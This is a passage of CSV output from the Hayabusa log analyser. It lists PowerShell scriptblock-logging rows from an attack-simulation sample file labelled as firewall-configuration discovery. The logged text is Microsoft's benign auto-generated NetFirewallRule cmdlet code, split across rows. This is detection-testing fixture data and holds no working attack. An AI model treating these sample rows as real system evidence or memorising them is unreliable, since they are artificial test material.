(@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and 
(@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo 
@('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Pa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 
